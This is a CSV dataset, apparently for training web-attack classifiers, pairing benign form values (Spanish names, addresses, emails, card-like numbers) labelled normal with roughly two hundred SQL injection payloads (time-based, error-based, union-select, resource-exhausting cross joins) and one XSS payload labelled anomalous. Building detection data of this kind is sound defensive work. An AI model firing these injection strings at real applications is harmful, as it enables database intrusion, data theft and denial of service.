"payload","length","attack_type","label"
"c/ caridad s/n","14","norm","norm"
"campello, el","12","norm","norm"
"1442431887503330","16","norm","norm"
"nue37","5","norm","norm"
"tufts3@joll.rs","14","norm","norm"
"22997112x","9","norm","norm"
"arenas de san juan","18","norm","norm"
"19245","5","norm","norm"
"fennell","7","norm","norm"
"d50allecido","11","norm","norm"
"genny","5","norm","norm"
"03248i367ca","11","norm","norm"
"grubel8@albeiteria.kw","21","norm","norm"
"83497200r","9","norm","norm"
"martn de yeltes","15","norm","norm"
"1769471856078209","16","norm","norm"
"cascabela","9","norm","norm"
"ludolfo","7","norm","norm"
"snerd@bwds.tj","13","norm","norm"
"15365381r","9","norm","norm"
"regueras de arriba","18","norm","norm"
"08281","5","norm","norm"
"7497","4","norm","norm"
"mckenney","8","norm","norm"
"poma gozalbo","12","norm","norm"
"loti@ajuntamentbarcelona2-0.is","30","norm","norm"
"c/ huertas altas, 114","21","norm","norm"
"sequera de haza, la","19","norm","norm"
"8755728520539974","16","norm","norm"
"kindra","6","norm","norm"
"josias","6","norm","norm"
"fonoll zurko","12","norm","norm"
"07408152j","9","norm","norm"
"c/ aira de villaescusa 199, 1f","30","norm","norm"
"09530","5","norm","norm"
"4190369223587522","16","norm","norm"
"5x8r0r","6","norm","norm"
"5599","4","norm","norm"
"indocto","7","norm","norm"
"serneo","6","norm","norm"
"marieau8@clementelr.nz","22","norm","norm"
"24314757p","9","norm","norm"
"04742","5","norm","norm"
"3363230401310436","16","norm","norm"
"correccionalmente","17","norm","norm"
"cleofs","6","norm","norm"
"europa, 58 2-f","14","norm","norm"
"21388","5","norm","norm"
"vasilopo","8","norm","norm"
"ladronzue_lo","12","norm","norm"
"elbeze","6","norm","norm"
"cachapera","9","norm","norm"
"hibbert.bupp@hojadecalculo.com.mil","34","norm","norm"
"56163821y","9","norm","norm"
"zarratn","7","norm","norm"
"6341227779092516","16","norm","norm"
"er3t3e1","7","norm","norm"
"atanaspulos","11","norm","norm"
"38355013y","9","norm","norm"
"plaa catalunya 124, 5-b","23","norm","norm"
"19312","5","norm","norm"
"1437589782727245","16","norm","norm"
"cuatriduana","11","norm","norm"
"1565","4","norm","norm"
"ti7o","4","norm","norm"
"folch pintado","13","norm","norm"
"00474767r","9","norm","norm"
"manuel pereira s/n 12?a","23","norm","norm"
"esther","6","norm","norm"
"labranto","8","norm","norm"
"pelez bastus","12","norm","norm"
"pianka@noviasteresapalacios.mc","30","norm","norm"
"c/ doctor ferran, 193","21","norm","norm"
"38787","5","norm","norm"
"fitzgera","8","norm","norm"
"13g0e7at42a","11","norm","norm"
"kinnie","6","norm","norm"
"ret4ne3or","9","norm","norm"
"vettenranta@infopromo.az","24","norm","norm"
"el caaveral 130, 5-f","20","norm","norm"
"9139561296743472","16","norm","norm"
"valina","6","norm","norm"
"yoselie","7","norm","norm"
"pool echenique","14","norm","norm"
"calle holanda 146,","18","norm","norm"
"tres villas, las","16","norm","norm"
"5426744631176158","16","norm","norm"
"patrica0","8","norm","norm"
"mankowsk","8","norm","norm"
"4a39c44a","8","norm","norm"
"bow@whitepearlresort.pl","23","norm","norm"
"01472954b","9","norm","norm"
"adradas","7","norm","norm"
"18417","5","norm","norm"
"smelters","8","norm","norm"
"tamboreo","8","norm","norm"
"lamas","5","norm","norm"
"sipperly.nakamoto@ceramicasmio.ht","33","norm","norm"
"carretera 200 hasta km. 1 barra de mio 175","42","norm","norm"
"manzanilla","10","norm","norm"
"1181707541494323","16","norm","norm"
"jalaie","6","norm","norm"
"1613","4","norm","norm"
"joelly","6","norm","norm"
"flaviano","8","norm","norm"
"oshea_knowles@tiaherminia.gh","28","norm","norm"
"calle del llenguadoc s/n, 6e","28","norm","norm"
"pujalt","6","norm","norm"
"0269447503610316","16","norm","norm"
"kristel","7","norm","norm"
"reiji","5","norm","norm"
"estolano boget","14","norm","norm"
"62145911a","9","norm","norm"
"travesia barrionuevo, 49","24","norm","norm"
"7738690201675696","16","norm","norm"
"daisey","6","norm","norm"
"2925","4","norm","norm"
"doris","5","norm","norm"
"bergad faix","11","norm","norm"
"sibirskaia@euskalcasino.es","26","norm","norm"
"1')) and elt(1210=1210,sleep(5)) and (('ogpg'='ogpg","51","sqli","anom"
"1) or 7417=(select count(*) from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3)--","104","sqli","anom"
"1"") and 9198=9198--","19","sqli","anom"
"1;select count(*) from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3-- uugg","98","sqli","anom"
"-2761 or 1144=7657-- mfml","25","sqli","anom"
"1"") and char(107)||char(121)||char(97)||char(80)=regexp_substring(repeat(left(crypt_key(char(65)||char(69)||char(83),null),0),500000000),null)--","144","sqli","anom"
"1"";select count(*) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 and ""mpxd"" like ""mpxd","110","sqli","anom"
"1 where 3478=3478 (select (case when (4587=4587) then regexp_substring(repeat(left(crypt_key(char(65)||char(69)||char(83),null),0),500000000),null) else char(76)||char(65)||char(102)||char(72) end) from (values(0)))--","217","sqli","anom"
"1%')) or (select * from (select(sleep(5)))sddo)#","48","sqli","anom"
"1',(select (case when (8640=8640) then (ascii(regexp_substring(repeat(right(char(8640),0),500000000),null))) else 8640/(select 0 from information_schema.system_users) end) from information_schema.system_users)--","211","sqli","anom"
"1%' or char(117)||char(111)||char(105)||char(100)=regexp_substring(repeat(left(crypt_key(char(65)||char(69)||char(83),null),0),500000000),null) and '%'='","153","sqli","anom"
"1' rlike (select (case when (5384=7060) then 1 else 0x28 end))","62","sqli","anom"
"1"";select dbms_pipe.receive_message(chr(112)||chr(70)||chr(106)||chr(78),5) from dual--","87","sqli","anom"
"-8924)) as jybr where 7901=7901 or elt(1032=1032,3623)--","56","sqli","anom"
"1) and (3020=3020)*6703","23","sqli","anom"
"1 rlike sleep(5)# urxh","22","sqli","anom"
"1%')));select (case when (5752=6036) then 1 else 5752*(select 5752 from master..sysdatabases) end)--","100","sqli","anom"
"1' and 9970=3409","16","sqli","anom"
"1""));select (case when (3499=4209) then 3499 else 3499*(select 3499 from mysql.db) end)#","88","sqli","anom"
"1'+(select rdwb where 2498=2498 and 3429=7639--","47","sqli","anom"
"1'+(select zwsr where 6567=6567;select pg_sleep(5))+'","53","sqli","anom"
"-7796') union all select 4960,4960,4960,4960,4960,4960,4960,4960,4960,4960#","75","sqli","anom"
"-6970"")) or 1570=convert(int,(select char(113)+char(113)+char(112)+char(106)+char(113)+(select (case when (1570=1570) then char(49) else char(48) end))+char(113)+char(122)+char(118)+char(122)+char(113))) and ((""dyrq"" like ""dyrq","227","sqli","anom"
"1) as kjsd where 1670=1670 or 1022=(select count(*) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5)--","124","sqli","anom"
"1"" and 6414=(select count(*) from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4) and ""uvvy"" like ""uvvy","130","sqli","anom"
"1) where 5261=5261 and elt(1210=1210,sleep(5))--","48","sqli","anom"
"1'));call regexp_substring(repeat(left(crypt_key(char(65)||char(69)||char(83),null),0),500000000),null) and (('yaml'='yaml","122","sqli","anom"
"1"")) and 7533=7533 and ((""rnni"" like ""rnni","42","sqli","anom"
"1""));iif(8770=9611,1,1/0)","25","sqli","anom"
"1%"" or updatexml(1808,concat(0x2e,0x7171706a71,(select (elt(1808=1808,1))),0x717a767a71),8666) and ""%""=""","104","sqli","anom"
"1) as cfnz where 6065=6065 union all select null,null,null,null,null,null,null,null,null#","89","sqli","anom"
"-6122'))) or 9243=6161--","24","sqli","anom"
"1%"")(select (case when (4587=4587) then regexp_substring(repeat(left(crypt_key(char(65)||char(69)||char(83),null),0),500000000),null) else char(76)||char(65)||char(102)||char(72) end) from (values(0))) and (""%""=""","212","sqli","anom"
"1 where 4968=4968 or updatexml(1808,concat(0x2e,0x7171706a71,(select (elt(1808=1808,1))),0x717a767a71),8666)--","110","sqli","anom"
"-5606) union all select 7118,7118,7118,7118,7118,7118,7118,7118,7118#","69","sqli","anom"
"1 or updatexml(1808,concat(0x2e,0x7171706a71,(select (elt(1808=1808,1))),0x717a767a71),8666)-- btqa","99","sqli","anom"
"1'||(select 'ywjy' where 7579=7579;call regexp_substring(repeat(left(crypt_key(char(65)||char(69)||char(83),null),0),500000000),null)--","135","sqli","anom"
"-3228"") or (5901=1570)*1570 and (""egdd""=""egdd","45","sqli","anom"
"1) rlike sleep(5)#","18","sqli","anom"
"1%' and 3202=like('abcdefg',upper(hex(randomblob(500000000/2)))) and '%'='","74","sqli","anom"
"1)) as qgok where 3993=3993 and 3824=benchmark(5000000,md5(0x76555642))--","73","sqli","anom"
"1%""))) and 7533=7533 and (((""%""=""","33","sqli","anom"
"1)) and make_set(8403=8403,8899) and ((4686=4686","48","sqli","anom"
"1'+(select uqdb where 3508=3508 or 4915=(select count(*) from domain.domains as t1,domain.columns as t2,domain.tables as t3)--","126","sqli","anom"
"1%')) and 3202=like('abcdefg',upper(hex(randomblob(500000000/2)))) and (('%'='","78","sqli","anom"
"-3566%' or 2158=6289","20","sqli","anom"
"1"")) and 4241=convert(int,(select char(113)+char(113)+char(112)+char(106)+char(113)+(select (case when (4241=4241) then char(49) else char(48) end))+char(113)+char(122)+char(118)+char(122)+char(113))) and ((""bxcb"" like ""bxcb","224","sqli","anom"
"1"")) and 6969=(select 6969 from pg_sleep(5)) and ((""nepk""=""nepk","63","sqli","anom"
"1%""))) union all select null#","29","sqli","anom"
"-9405' union all select 2539--","30","sqli","anom"
"1%"";select sleep(5)#","20","sqli","anom"
"-8791""))) or make_set(6681=6620,6620) and (((""pvdk""=""pvdk","57","sqli","anom"
"-1988 where 4597=4597 union all select 4597,4597,4597,4597,4597,4597--","70","sqli","anom"
"1"") as nyui where 2511=2511;iif(5257=5257,1,1/0)","48","sqli","anom"
"1%"") or sleep(5)#","17","sqli","anom"
"-3626%"") or 3440=cast((chr(113)||chr(113)||chr(112)||chr(106)||chr(113))||(select (case when (3440=3440) then 1 else 0 end))::text||(chr(113)||chr(122)||chr(118)||chr(122)||chr(113)) as numeric) and (""%""=""","205","sqli","anom"
"1' and exp(~(select * from (select concat(0x7171706a71,(select (elt(8190=8190,1))),0x717a767a71,0x78))x)) and 'ulep'='ulep","122","sqli","anom"
"1');select like('abcdefg',upper(hex(randomblob(500000000/2))))","62","sqli","anom"
"1'||(select 'cqjw' from dual where 7335=7335 and 8514=(select count(*) from domain.domains as t1,domain.columns as t2,domain.tables as t3))||'","142","sqli","anom"
"1');select case when 7717=7717 then 1 else null end--","53","sqli","anom"
"1"" and 3707=(select count(*) from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3)","103","sqli","anom"
"-3954')) union all select 2417,2417--","37","sqli","anom"
"1"" rlike (select * from (select(sleep(5)))sgvo) and ""wcze""=""wcze","64","sqli","anom"
"-5910%'))) union all select 5184,5184,5184,5184,5184,5184,5184,5184,5184,5184--","79","sqli","anom"
"1' where 9544=9544;(select * from (select(sleep(5)))acdk)#","58","sqli","anom"
"-8112'))) or 3440=cast((chr(113)||chr(113)||chr(112)||chr(106)||chr(113))||(select (case when (3440=3440) then 1 else 0 end))::text||(chr(113)||chr(122)||chr(118)||chr(122)||chr(113)) as numeric) and ((('xopg'='xopg","215","sqli","anom"
"1')) as qwdh where 7581=7581 or char(117)||char(111)||char(105)||char(100)=regexp_substring(repeat(left(crypt_key(char(65)||char(69)||char(83),null),0),500000000),null)--","170","sqli","anom"
"1%""))) and 3824=benchmark(5000000,md5(0x76555642)) and (((""%""=""","63","sqli","anom"
"1%') or elt(5873=5873,sleep(5))#","32","sqli","anom"
"1)) as uadn where 9588=9588 rlike sleep(5)#","43","sqli","anom"
"1""))) or updatexml(1808,concat(0x2e,0x7171706a71,(select (elt(1808=1808,1))),0x717a767a71),8666) and (((""tzqk"" like ""tzqk","121","sqli","anom"
"1')) or 6793=(select 6793 from pg_sleep(5)) and (('qiau'='qiau","62","sqli","anom"
"1'+(select xzvf where 9727=9727;(select * from (select(sleep(5)))acdk)#","71","sqli","anom"
"1"" or sleep(5) and ""telb""=""telb","31","sqli","anom"
"1';select count(*) from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3","92","sqli","anom"
"1"")) or 5286=(select count(*) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5) and ((""lano""=""lano","119","sqli","anom"
"1'||(select 'ttyt' where 3751=3751 or 7417=(select count(*) from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3)--","136","sqli","anom"
"1"")) and 6414=(select count(*) from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4) and ((""uzbl""=""uzbl","129","sqli","anom"
"1' and 3202=like('abcdefg',upper(hex(randomblob(500000000/2)))) and 'rpiz' like 'rpiz","85","sqli","anom"
"1"") where 3390=3390;call regexp_substring(repeat(right(char(3702),0),500000000),null)--","87","sqli","anom"
"1%"";select (case when (3855=3855) then 3855 else 1/(select 0) end)--","68","sqli","anom"
"1%';select count(*) from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 and '%'='","103","sqli","anom"
"1%') or 7427=dbms_pipe.receive_message(chr(116)||chr(87)||chr(90)||chr(109),5)--","80","sqli","anom"
"1'+(select ijck where 9961=9961 or (select 2*(if((select * from (select concat(0x7171706a71,(select (elt(8113=8113,1))),0x717a767a71,0x78))s), 8446744073709551610, 8446744073709551610))))+'","189","sqli","anom"
"-3044') or 4999=3051#","21","sqli","anom"
"1 where 5401=5401 and elt(1210=1210,sleep(5))--","47","sqli","anom"
"1')));select count(*) from domain.domains as t1,domain.columns as t2,domain.tables as t3 and ((('jutx'='jutx","108","sqli","anom"
"1 and (select * from (select(sleep(5)))fzno)# bkjl","50","sqli","anom"
"1) as amgf where 4308=4308 and char(120)||char(106)||char(117)||char(85)=regexp_substring(repeat(right(char(9981),0),5000000000),null)--","136","sqli","anom"
"-2896')) as wisk where 1030=1030 union all select 1030,1030,1030,1030#","70","sqli","anom"
"1 or char(117)||char(111)||char(105)||char(100)=regexp_substring(repeat(left(crypt_key(char(65)||char(69)||char(83),null),0),500000000),null)-- ztzu","148","sqli","anom"
"1 where 6036=6036 and 7533=7533--","33","sqli","anom"
"-9445) as dmur where 4371=4371 union all select 4371,4371,4371,4371,4371,4371,4371,4371,4371,4371#","98","sqli","anom"
"1%"")));select case when 7717=7717 then 1 else null end--","56","sqli","anom"
"1)) as wwys where 9248=9248;(select * from (select(sleep(5)))srmq)--","68","sqli","anom"
"1'||(select 'kitk' where 6311=6311;select * from generate_series(8147,8147,case when (8147=6336) then 1 else 0 end) limit 1--","125","sqli","anom"
"1%')) or (select 9173 from(select count(*),concat(0x7171706a71,(select (elt(9173=9173,1))),0x717a767a71,floor(rand(0)*2))x from information_schema.character_sets group by x)a) and (('%'='","187","sqli","anom"
"1%'));select (case when (7594=8086) then 7594 else 1/(select 0) end)--","70","sqli","anom"
"1')) rlike (select (case when (8489=8820) then 1 else 0x28 end)) and (('fbjf'='fbjf","83","sqli","anom"
"-9810') where 4361=4361 or elt(1032=1032,3623)--","48","sqli","anom"
"1'||(select 'xuof' from dual where 8794=8794 or 8156=(select count(*) from generate_series(1,5000000))--","104","sqli","anom"
"1'+(select 'zkum' where 5161=5161 union all select null,null,null,null#","71","sqli","anom"
"1' and 2006=2006","16","sqli","anom"
"(select (case when (6986=6986) then 6986 else 6986*(select 6986 from mysql.db) end))","84","sqli","anom"
"1) and 3754=(select upper(xmltype(chr(60)||chr(58)||chr(113)||chr(113)||chr(112)||chr(106)||chr(113)||(select (case when (3754=3754) then 1 else 0 end) from dual)||chr(113)||chr(122)||chr(118)||chr(122)||chr(113)||chr(62))) from dual) and (3530=3530","249","sqli","anom"
"1')));call regexp_substring(repeat(left(crypt_key(char(65)||char(69)||char(83),null),0),500000000),null) and ((('vwxg'='vwxg","124","sqli","anom"
"select 'qqpjq'||(select (case when (2933=2933) then 1 else 0 end))||'qzvzq'","75","sqli","anom"
"1"" where 7696=7696 and 3754=(select upper(xmltype(chr(60)||chr(58)||chr(113)||chr(113)||chr(112)||chr(106)||chr(113)||(select (case when (3754=3754) then 1 else 0 end) from dual)||chr(113)||chr(122)||chr(118)||chr(122)||chr(113)||chr(62))) from dual)--","252","sqli","anom"
"1 where 6523=6523 and 8594=(select 8594 from pg_sleep(5))--","59","sqli","anom"
"1')) as jmnw where 6496=6496 or 4411=(select count(*) from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7)--","180","sqli","anom"
"1) and 6510=(select count(*) from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7) and (9841=9841","168","sqli","anom"
"1"")) rlike (select * from (select(sleep(5)))sgvo) and ((""grct""=""grct","68","sqli","anom"
"-2601') union all select 2866,2866,2866,2866,2866,2866--","56","sqli","anom"
"1'||(select 'jlka' where 5436=5436 or 4915=(select count(*) from domain.domains as t1,domain.columns as t2,domain.tables as t3)--","129","sqli","anom"
"1%'))) and (select * from (select(sleep(5)))gcrr)#","50","sqli","anom"
"-1366' or make_set(9354=9354,7185) and 'abre'='abre","51","sqli","anom"
"-3452%' or 1570=convert(int,(select char(113)+char(113)+char(112)+char(106)+char(113)+(select (case when (1570=1570) then char(49) else char(48) end))+char(113)+char(122)+char(118)+char(122)+char(113))) and '%'='","212","sqli","anom"
"1' in boolean mode) order by 1#","31","sqli","anom"
"1%"") and 4386=utl_inaddr.get_host_address(chr(113)||chr(113)||chr(112)||chr(106)||chr(113)||(select (case when (4386=4386) then 1 else 0 end) from dual)||chr(113)||chr(122)||chr(118)||chr(122)||chr(113)) and (""%""=""","214","sqli","anom"
"1'||(select 'qtep' where 2572=2572 or (select * from (select(sleep(5)))sddo)#","77","sqli","anom"
"1%')) or 8156=(select count(*) from generate_series(1,5000000))--","65","sqli","anom"
"-4807' or 5023=ctxsys.drithsx.sn(5023,(chr(113)||chr(113)||chr(112)||chr(106)||chr(113)||(select (case when (5023=5023) then 1 else 0 end) from dual)||chr(113)||chr(122)||chr(118)||chr(122)||chr(113))) and 'wwki'='wwki","218","sqli","anom"
"1 rlike (select * from (select(sleep(5)))vwyq)#","47","sqli","anom"
"1"") and 2954=1256--","19","sqli","anom"
"1%"" and 8189=(select count(*) from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3)--","106","sqli","anom"
"1'+(select 'qaar' where 7841=7841 or 5286=(select count(*) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5))+'","132","sqli","anom"
"1%'))) and 5556=(select count(*) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5) and ((('%'='","116","sqli","anom"
"1%';select like('abcdefg',upper(hex(randomblob(500000000/2)))) and '%'='","72","sqli","anom"
"1)) as syot where 1199=1199;waitfor delay '0:0:5'--","51","sqli","anom"
"1%'));select (case when (3855=3855) then 3855 else 1/(select 0) end)--","70","sqli","anom"
"1'+(select 'jkgf' where 7487=7487;select dbms_pipe.receive_message(chr(112)||chr(70)||chr(106)||chr(78),5) from dual--","118","sqli","anom"
"1"" where 2035=2035 and 3824=benchmark(5000000,md5(0x76555642))--","64","sqli","anom"
"1%')));begin user_lock.sleep(5); end--","38","sqli","anom"
"1%') or row(1045,7562)>(select count(*),concat(0x7171706a71,(select (elt(1045=1045,1))),0x717a767a71,floor(rand(0)*2))x from (select 8488 union select 5584 union select 3051 union select 1210)a group by x) and ('%'='","216","sqli","anom"
"1'||(select 'zeet' from dual where 9567=9567 and 8594=(select 8594 from pg_sleep(5))--","86","sqli","anom"
"1) as guru where 7615=7615 union all select null,null,null,null,null,null,null,null,null,null#","94","sqli","anom"
"1%"" and 2805=1345","17","sqli","anom"
"1' in boolean mode) or 8514=benchmark(5000000,md5(0x544d5a4c))#","63","sqli","anom"
"1') and 6969=(select 6969 from pg_sleep(5)) and ('nqol'='nqol","61","sqli","anom"
"1 and 7756=dbms_utility.sqlid_to_sqlhash((chr(113)||chr(113)||chr(112)||chr(106)||chr(113)||(select (case when (7756=7756) then 1 else 0 end) from dual)||chr(113)||chr(122)||chr(118)||chr(122)||chr(113)))","204","sqli","anom"
"1));call regexp_substring(repeat(right(char(2385),0),500000000),null)--","71","sqli","anom"
"1""))) and exp(~(select * from (select concat(0x7171706a71,(select (elt(8190=8190,1))),0x717a767a71,0x78))x)) and (((""sdvu"" like ""sdvu","133","sqli","anom"
"1%';create or replace function sleep(int) returns int as '/lib/libc.so.6','sleep' language 'c' strict; select sleep(5) and '%'='","128","sqli","anom"
"1'))) rlike sleep(5)#","21","sqli","anom"
"1%';select like('abcdefg',upper(hex(randomblob(500000000/2))))--","64","sqli","anom"
"1') and (3020=3020)*6703 and ('rskq'='rskq","42","sqli","anom"
"1')) procedure analyse(extractvalue(5840,concat(0x5c,0x7171706a71,(select (case when (5840=5840) then 1 else 0 end)),0x717a767a71)),1) and (('wqme'='wqme","153","sqli","anom"
"1%""))) union all select null,null,null,null--","45","sqli","anom"
"1"")) or 8466=benchmark(5000000,md5(0x694a4745)) and ((""iuxs"" like ""iuxs","71","sqli","anom"
"1"")) as lfte where 3811=3811 or exp(~(select * from (select concat(0x7171706a71,(select (elt(6270=6270,1))),0x717a767a71,0x78))x))--","132","sqli","anom"
"1%""))) and 5556=(select count(*) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5) and (((""%""=""","116","sqli","anom"
"1 where 8114=8114 and 6510=(select count(*) from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7)--","170","sqli","anom"
"-2204'||(select 'bwae' from dual where 4884=4884 union all select 4884,4884,4884,4884,4884,4884,4884,4884,4884,4884#","116","sqli","anom"
"1%"") or 8466=benchmark(5000000,md5(0x694a4745)) and (""%""=""","58","sqli","anom"
"1%"");begin dbms_lock.sleep(5); end and (""%""=""","45","sqli","anom"
"-1598"")) or elt(5329=9628,9628) and ((""hyxq"" like ""hyxq","55","sqli","anom"
"1'))) and char(109)||char(79)||char(70)||char(90)=regexp_substring(repeat(right(char(5012),0),5000000000),null)--","113","sqli","anom"
"1')) as xirr where 2425=2425;select sleep(5)#","45","sqli","anom"
"-4904') as ogyu where 2821=2821 or 5982=1643","44","sqli","anom"
"1"";begin user_lock.sleep(5); end--","34","sqli","anom"
"1%"")) order by 1--","18","sqli","anom"
"1 and char(107)||char(121)||char(97)||char(80)=regexp_substring(repeat(left(crypt_key(char(65)||char(69)||char(83),null),0),500000000),null)--","142","sqli","anom"
"1')));select like('abcdefg',upper(hex(randomblob(500000000/2))))--","66","sqli","anom"
"1'+(select ummn where 8883=8883 and 4241=convert(int,(select char(113)+char(113)+char(112)+char(106)+char(113)+(select (case when (4241=4241) then char(49) else char(48) end))+char(113)+char(122)+char(118)+char(122)+char(113))))+'","230","sqli","anom"
"-3649"")) as eydu where 3220=3220 or elt(8705=1510,1510)--","57","sqli","anom"
"-4615' or 4493=utl_inaddr.get_host_address(chr(113)||chr(113)||chr(112)||chr(106)||chr(113)||(select (case when (4493=4493) then 1 else 0 end) from dual)||chr(113)||chr(122)||chr(118)||chr(122)||chr(113))","204","sqli","anom"
"1',(select (case when (5154=5154) then 1 else 5154*(select 5154 from master..sysdatabases) end))","96","sqli","anom"
"1')) procedure analyse(extractvalue(5840,concat(0x5c,0x7171706a71,(select (case when (5840=5840) then 1 else 0 end)),0x717a767a71)),1) and (('asdc' like 'asdc","158","sqli","anom"
"1) where 8474=8474 or 5356=(select count(*) from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7)--","170","sqli","anom"
"1' where 6795=6795 and 8635=(select count(*) from generate_series(1,5000000))--","79","sqli","anom"
"1%"" or 8315=(select count(*) from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3) and ""%""=""","113","sqli","anom"
"1));if(2643=1393) select 2643 else drop function nqss--","55","sqli","anom"
"1) where 1487=1487;begin dbms_lock.sleep(5); end--","50","sqli","anom"
"1'))) and 4386=utl_inaddr.get_host_address(chr(113)||chr(113)||chr(112)||chr(106)||chr(113)||(select (case when (4386=4386) then 1 else 0 end) from dual)||chr(113)||chr(122)||chr(118)||chr(122)||chr(113)) and ((('smrw' like 'smrw","229","sqli","anom"
"1' in boolean mode) or row(1045,7562)>(select count(*),concat(0x7171706a71,(select (elt(1045=1045,1))),0x717a767a71,floor(rand(0)*2))x from (select 8488 union select 5584 union select 3051 union select 1210)a group by x)#","221","sqli","anom"
"1%"") and 8312=dbms_pipe.receive_message(chr(69)||chr(79)||chr(101)||chr(68),5)--","80","sqli","anom"
"1"") where 5938=5938 and (select * from (select(sleep(5)))gcrr)#","63","sqli","anom"
"1')) as hxxm where 3792=3792 and sleep(5)#","42","sqli","anom"
"1)) and 6537=dbms_pipe.receive_message(chr(76)||chr(116)||chr(117)||chr(65),5) and ((6010=6010","94","sqli","anom"
"-9700') or 8811=7862","20","sqli","anom"
"1%'))) or 5286=(select count(*) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5) and ((('%'='","115","sqli","anom"
"-9429') order by 1--","20","sqli","anom"
"1"")) or 4411=(select count(*) from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7) and ((""pmmr""=""pmmr","173","sqli","anom"
"1 where 1153=1153 or extractvalue(1297,concat(0x5c,0x7171706a71,(select (elt(1297=1297,1))),0x717a767a71))--","108","sqli","anom"
"-5350)) or 9323=9323#","21","sqli","anom"
"1' in boolean mode) and 5725=5552#","34","sqli","anom"
"1) as duqb where 6495=6495;select (case when (5914=2314) then 5914 else 1/(select 0) end)--","91","sqli","anom"
"1"") and 4241=convert(int,(select char(113)+char(113)+char(112)+char(106)+char(113)+(select (case when (4241=4241) then char(49) else char(48) end))+char(113)+char(122)+char(118)+char(122)+char(113))) and (""hbfr"" like ""hbfr","222","sqli","anom"
"1') and 3707=(select count(*) from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3) and ('ejnt' like 'ejnt","127","sqli","anom"
"1) where 1096=1096;if(7899=7899) select 7899 else drop function zbbp--","70","sqli","anom"
"1) or 8421=(select count(*) from generate_series(1,5000000)) and (5215=5215","75","sqli","anom"
"1',(cast((chr(113)||chr(113)||chr(112)||chr(106)||chr(113))||(select (case when (7823=7823) then 1 else 0 end))::text||(chr(113)||chr(122)||chr(118)||chr(122)||chr(113)) as numeric))","182","sqli","anom"
"1"")) or 8421=(select count(*) from generate_series(1,5000000)) and ((""vhey""=""vhey","81","sqli","anom"
"1'||(select 'glyc' from dual where 4058=4058;(select * from (select(sleep(5)))srmq))||'","87","sqli","anom"
"-1305) or make_set(2298=5545,5545) and (6715=6715","49","sqli","anom"
"1';begin user_lock.sleep(5); end and 'huti' like 'huti","54","sqli","anom"
"1'))) and 9660=(select count(*) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5)--","104","sqli","anom"
"1""));select count(*) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 and ((""swec"" like ""swec","114","sqli","anom"
"1%' and extractvalue(7982,concat(0x5c,0x7171706a71,(select (elt(7982=7982,1))),0x717a767a71)) and '%'='","103","sqli","anom"
"1"";call regexp_substring(repeat(left(crypt_key(char(65)||char(69)||char(83),null),0),500000000),null) and ""rbqs""=""rbqs","118","sqli","anom"
"-7552 or 6872=6872","18","sqli","anom"
"-5438"") union all select 3170,3170--","36","sqli","anom"
"1"" or 8384=like('abcdefg',upper(hex(randomblob(500000000/2)))) and ""menm"" like ""menm","84","sqli","anom"
"-8486%'))) or 8571=8571--","25","sqli","anom"
"1)) as khvx where 7533=7533 union all select null,null,null,null,null,null,null,null--","86","sqli","anom"
"1"")));select pg_sleep(5) and (((""wqeb""=""wqeb","44","sqli","anom"
"-2872) where 8797=8797 or 1 group by concat(0x7171706a71,(select (case when (4232=4232) then 1 else 0 end)),0x717a767a71,floor(rand(0)*2)) having min(0)#","153","sqli","anom"
"1;select like('abcdefg',upper(hex(randomblob(500000000/2))))-- ygbf","67","sqli","anom"
"(select (chr(113)||chr(113)||chr(112)||chr(106)||chr(113))||(select (case when (3287=3287) then 1 else 0 end))::text||(chr(113)||chr(122)||chr(118)||chr(122)||chr(113)))","169","sqli","anom"
"-2216"") where 6692=6692 union all select 6692,6692,6692#","56","sqli","anom"
"-4135'))) union all select 4413,4413,4413#","42","sqli","anom"
"1%'))) union all select null,null--","35","sqli","anom"
"-6279') union all select 3026,3026,3026,3026,3026,3026,3026,3026--","66","sqli","anom"
"1) and 3824=benchmark(5000000,md5(0x76555642)) and (6786=6786","61","sqli","anom"
"-2291)) or 4067=5666#","21","sqli","anom"
"1"")) as xtlt where 9293=9293;select case when 7717=7717 then 1 else null end--","78","sqli","anom"
"1""));waitfor delay '0:0:5'--","28","sqli","anom"
"1') where 6672=6672 union all select null,null,null,null,null,null,null,null,null,null--","88","sqli","anom"
"<button.onclick=""alert(string.fromcharcode(60,115,99,114,105,112,116,62,97,108,101,114,116,40,34,67,114,111,115,115,83,105,116,101,83,99,114,105,112,116,105,110,103,64,82,69,77,7,86,69,34,41,60,47,115,99,114,105,112,116,62));"">string:from.char.code</button></body></html>","271","xss","anom"
